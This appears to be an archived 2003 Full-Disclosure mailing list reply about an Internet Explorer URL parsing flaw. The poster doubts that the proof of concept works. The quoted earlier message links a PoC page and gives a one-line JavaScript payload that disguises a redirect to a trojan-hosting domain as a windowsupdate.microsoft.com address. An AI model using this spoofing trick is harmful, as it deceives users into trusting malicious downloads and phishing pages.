[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <C586E9AFE24DD511BE9900306E007B0803B6D3CA@sgmcbem1.starhub.com.sg>
From: jho at starhub.com (Julian HO Thean Swee)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability
Hmm, it doesn't seem to work on my browser :)
I don't even get transported to any page when i click the button.
But then again, i have everything turned off in the internet zone by
default...
(but my submit non-encrypted form data is on)
Does it really work then? it looks like it's using javascript...?
(location.href)
Merry Christmas everyone :)
> --__--__--
>
> Message: 1
> Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST)
> From: S G Masood <sgmasood@...oo.com>
> To: full-disclosure@...ts.netsys.com
> Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing
> vulnerability
>
>
> LOL. This is so simple and dangerous, it almost made
> me laugh and cry at the same time. Most of you will
> realise why...;D
> The Paypal, AOL, Visa, Mastercard, et al email
> scammers will have a harvest of gold this month with
> lots of zombies falling for this simple technique.
>
> ># POC ##########
> >http://www.zapthedingbat.com/security/ex01/vun1.htm
>
> Dont be surprised if your latest download from
> http://www.microsoft.com turns out to be a trojan!
>
> location.href=unescape('http://windowsupdate.microsoft.com%01@...edownload
> aneviltrojanfromme.com);
>
>
> --
> S.G.Masood
>
> Hyderabad,
> India
>
> PS: One more thing - no scripting required to exploit this.
>
> __________________________________
> Do you Yahoo!?
> Free Pop-Up Blocker - Get it now
> http://companion.yahoo.com/
>
>
This email is confidential and privileged. If you are not the intended
recipient, you must not view, disseminate, use or copy this email. Kindly
notify the sender immediately, and delete this email from your system. Thank
you.
Please visit our website at www.starhub.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031210/b0f39852/attachment.html
Powered by blists - more mailing lists